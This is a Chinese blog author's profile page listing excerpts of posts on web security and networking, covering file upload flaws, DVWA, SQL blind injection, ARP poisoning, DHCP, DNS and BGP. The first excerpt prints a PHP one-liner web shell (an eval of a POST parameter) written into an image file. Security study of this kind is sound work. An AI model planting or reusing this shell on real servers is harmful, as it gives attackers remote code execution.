3 santt

尚未进行身份认证

我要认证

暂无相关简介

等级
TA的排名 7w+

edjpgcom制作一句话图片木马

将图片直接拖到edjpgcom.exe程序上写入一句话木马<?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?>查看图片

2019-06-19 22:13:37

DVWA之File Upload文件上传

LOW:函数介绍:basename()函数返回路径中的文件名部分。string basename ( string $path [, string $suffix ] )参数介绍:$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个...

2019-06-19 22:13:27

文件包含漏洞小结

1. 原理在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。开发过程中,多个文件都会用到的代码,通常会放到一个单独的文件中,用到时再包含进来。当把包含的文件写死在程序中时,该漏洞是不存在的,但很多情况都会动态的去包含所需的文件,这时候则会产生文件包含漏洞。实例代码<?php $filename...

2019-06-19 11:07:51

文件上传校验方式及绕过思路

文件上传校验方式客户端javascript校验(一般只校验后缀名)服务端校验文件头content-type字段校验(image/gif)文件内容头校验(GIF89a)后缀名黑名单校验后缀名白名单校验自定义正则校验WAF设备校验(根据不同的WAF产品而定)1. 客户端校验一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。判断...

2019-06-17 22:48:44

文件上传漏洞

原理一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。漏洞起因对于上传文件的后缀名没有做严格的限制对于上传文件的MIMETYPE没有做检查没有限制上传的文件的文件权限对于上传文件或者指定目录的行为没有做限制漏洞测试过程正常上传,抓包分析尝试上传不同类型的恶意脚本文...

2019-06-17 22:44:32

常用MIME Type表

多用途互联网邮件扩展(MIME,MultipurposeInternet Mail Extensions)是一个互联网标准,它扩展了电子邮件标准,使其能够支持非ASCII字符、二进制格式附件等多种格式的邮件消息。内容类型(Content-Type),这个头部领域用于指定消息的类型。一般以下面的形式出现。[type]/[subtype]text/plain(纯文本) text/html(HT...

2019-06-16 22:33:51

布尔型盲注基本思路

普通SQL注入SQL盲注执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注)一般在页面上直接就会显示执行sql语句的结果一般在页面上不会直接显示sql执行的结果有可能出现不确定sql是否执...

2019-06-10 21:42:56

SQL注入中常用的函数

mid()函数SELECT MID(ColumnName, Start [, Length])从指定字段中提取出字段的内容column_name:字段名start:开始位置length:长度实例Persons 表:IdLastNameFirstNameAddressCity1AdamsJohnOxfordStreet2BushGeorge...

2019-06-09 19:42:32

yum的配置与使用

yum简介yum的全称是yellow dog updater,modified,是一个shell前端软件包管理器;基于RPM包管理,能够从指定的服务器下载RPM包并自动安装,可以自动处理依赖性关系,并且一次性安装所有依赖的软件包,无需一次次频繁的下载、安装。yum源制作过程准备一台linux服务器,并确认服务器的IP;上传一个centOS-…iso镜像文件到服务器(镜像文件包含所...

2019-04-26 13:31:11

MPLS-多协议标签技术

MPLS(Multi-Protocol Label Switching多协议标签交换)ISP使用包交换:依赖报文中的IP地址进行数据转发标签交换:基于2.5层的标签号进行数据转发;无论网络层运行何种协议,2.5层均可运行标签交换;解决问题:解决BGP的路由黑洞问题MPLS VPNMPLS TE(流量工程)包交换的技术原始的路由:流量进入路由器后,路由器基于目标IP...

2019-04-18 17:07:35

生成树协议802.1D

二层桥接环路导致问题广播风暴当主机X发送一个广播包后假设SWITCH A在SEGMENT1收到广播包后,SWITCH A收到数据包后把数据广播到所有端口(除了数据包进入的端口)SWITCH B在SEGMENT 2网络收到数据包后会把数据广播到所有端口(除了数据包进入的端口)SWITCH A在SEGMENT 1网络收到数据包后会把数据广播到所有端口(除了数据包进入的端口)。以此继续就会...

2019-04-12 08:25:02

VLAN接口类型

VLANVLAN(Virtual Local Area Network)即虚拟局域网,是将一个物理的LAN在逻辑上划分成多个广播域的通信技术。作用限制广播域:广播域被限制在一个VLAN内,节省了带宽,提高了网络处理能力。增强局域网的安全性:不同VLAN内的报文在传输时是相互隔离的,即一个VLAN内的用户不能和其它VLAN内的用户直接通信。提高网络的健壮性:故障被限制在一个V...

2019-04-10 15:24:58

PPPoE工作流程

PPPoE(英语:Point-to-Point Protocol Over Ethernet)以太网上的点对点协议,是将点对点协议(PPP)封装在以太网(Ethernet)框架中的一种网络隧道协议。PPPoE协议及其工作过程PPPoE的工作过程分成两个阶段,即发现阶段(Discorvery)和PPP会话阶段。发现阶段(Discovery Stage)用户主机用广播的方式发出PADI...

2019-04-09 17:10:05

ARP毒化攻击

ARP欺骗(毒化)上面提到过了ARP缓存表,在每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。假设主机 A 192.168.1.2,B 192.168.1.3,C 192.168.1.4; 网关 G 192.168.1.1; 在同一局域网,主机A和B通过网关G相互通信,就好比A和B两个人写信,由邮递员G送信,C永远都不会知道A和B...

2019-04-08 13:24:21

5种类型的ARP工作过程

ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的。而RARP和ARP相反,它是反向地址转换协议,把MAC地址转换为IP地址。普通ARP(正向ARP)功能介绍:通过ip地址获得MAC地址工作过程:网络设备A发送数据包给网络设备...

2019-04-06 09:34:17

FTP原理解析

文件传输协议FTP(File Transfer Protocol)是因特网中使用最广泛的文件传输协议。FTP使用交互式的访问,允许客户指定文件的类型和格式(如指明是否使用ASCII码),并允许文件具有存取权限(如访问文件的用户必须经过授权,并输入有效的口令)。文件传输协议有基于TCP的FTP和基于UDP的简单文件传输协议TFTP,它们都是文件共享协议中的一大类,即复制整个文件,其特点是:若要存取...

2019-04-05 11:12:22

DHCP原理解析及工作过程

什么是DHCP?DHCP,动态主机配置协议,前身是BOOTP协议,是一个局域网的网络协议,使用UDP协议工作,常用的2个端口:67(DHCP server),68(DHCP client)。DHCP通常被用于局域网环境,主要作用是集中的管理、分配IP地址,使client动态的获得IP地址、Gateway地址、DNS服务器地址等信息,并能够提升地址的使用率。简单来说,DHCP就是一个不需要账号密...

2019-04-04 19:19:09

DNS原理及解析过程

DNS(域名系统Domain Name System)根域就是所谓的“.”,其实我们的网址www.baidu.com在配置当中应该是www.baidu.com.(最后有一点),一般我们在浏览器里输入时会省略后面的点,而这也已经成为了习惯。根域服务器我们知道有13台,但是这是错误的观点。根域服务器只是具有13个IP地址,但机器数量却不是13台,因为这些IP地址借助了任播的技术,所以我们可以...

2019-04-03 16:13:51

TCP的定时器

7种定时器建立连接定时器(connection-establishment timer)重传定时器(retransmission timer)延迟应答定时器(delayed ACK timer)坚持定时器(persist timer)保活定时器(keepalive timer)FIN_WAIT_2定时器(FIN_WAIT_2 timer)TIME_WAIT定时器 (TIME_WAI...

2019-04-02 16:34:46

BGP-边界网关协议

BGP(Border Gateway Protocol边界网关协议)无类别路径矢量EGP协议;基于AS进行工作;AS(自治系统):一个独立的管理域,内部可以运行多种IGP协议,但半径不易过大;为区分不同的AS,使用编号:0-65535公有:1-64511 私有:64512-65535IGP和EGP协议的区别IGP协议在工作时:收敛快占用资源少选路佳EGP协议在工...

2019-03-31 10:53:22

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。